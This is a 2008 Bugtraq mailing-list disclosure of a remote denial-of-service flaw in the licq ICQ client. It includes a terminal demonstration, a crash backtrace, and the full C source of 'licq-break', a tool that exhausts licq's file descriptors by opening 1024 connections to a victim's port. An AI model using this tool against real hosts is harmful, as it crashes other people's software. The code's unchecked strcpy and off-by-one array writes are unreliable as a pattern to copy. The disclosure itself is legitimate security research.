[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <1207660377.5403.43.camel@gat3way.globul.bg>
Date: Tue, 08 Apr 2008 16:12:56 +0300
From: Milen Rangelov <mrangelov@...bul.bg>
To: bugtraq@...urityfocus.com
Subject: licq remote DoS?
Hello,
Licq is a linux qt-based ICQ client. There is a vulnerability in the way
licq processes new incoming TCP connections which can be exploited by a
remote attacker to crash the client.
When executed, licq opens a listening socket at a random port (AFAIK
between 30000 and 65000). There is no host-based authentication and any
remote host can connect to it. Those connections are not closed by licq
after a given timeout period.
When all possible open file descriptors are exhausted (they are limited
to 1024 for non-root users in most linux installations /ulimit -n/), a
new incoming TCP connection causes licq to crash.
Here is some example:
We run licq:
gat3way@...3way:~$ licq
from another console, we find out the port licq is listening to (we'd
need to portscan if the target is on a remote system):
gat3way@...3way:/tmp$ lsof |grep licq|grep LISTEN
licq 10783 gat3way 9u IPv4 35993218 TCP
*:52259 (LISTEN)
Now we run our "evil" denial of service code:
gat3way@...3way:/tmp$ ./licq-break 127.0.0.1 52259
ip=127.0.0.1
done!
and go back to the console on which we ran licq...oops..
Licq Segmentation Violation Detected.
Backtrace (saved in /home/gat3way/.licq//licq.backtrace):
licq(licq_handle_sigabrt+0x2b4) [0x80f68d4]
[0xffffe420]
/lib/libc.so.6(abort+0x101) [0xb7b17811]
licq [0x80f6b1d]
[0xffffe420]
licq(_Z18MonitorSockets_tepPv+0x3ca) [0x80c907a]
/lib/libpthread.so.0 [0xb7d9e383]
/lib/libc.so.6(clone+0x5e) [0xb7bc173e]
Attempting to generate core file.
....
The source of licq-break (nothing particular, just connects MAX sockets
to a certain port at the victim's host):
-------------------------
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
// change to suit your needs
#define MAX 1024
int fds[MAX];
int main(int argc, char *argv[])
{
int port,a;
char host[12];
struct sockaddr_in victim;
struct in_addr inp;
if (argc!=3)
{
printf("usage: %s <ip> <port>\n",argv[0]);
exit(1);
}
port=atoi(argv[2]);
strcpy(host,argv[1]);
printf("ip=%s\n",host);
for (a=1;a<=MAX;a++)
{
fds[a]=socket(PF_INET,SOCK_STREAM,0);
victim.sin_family= AF_INET;
victim.sin_port=htons(port);
inet_aton(host,&victim.sin_addr);
connect(fds[a],&victim,sizeof(victim));
}
printf("done!");
}
Powered by blists - more mailing lists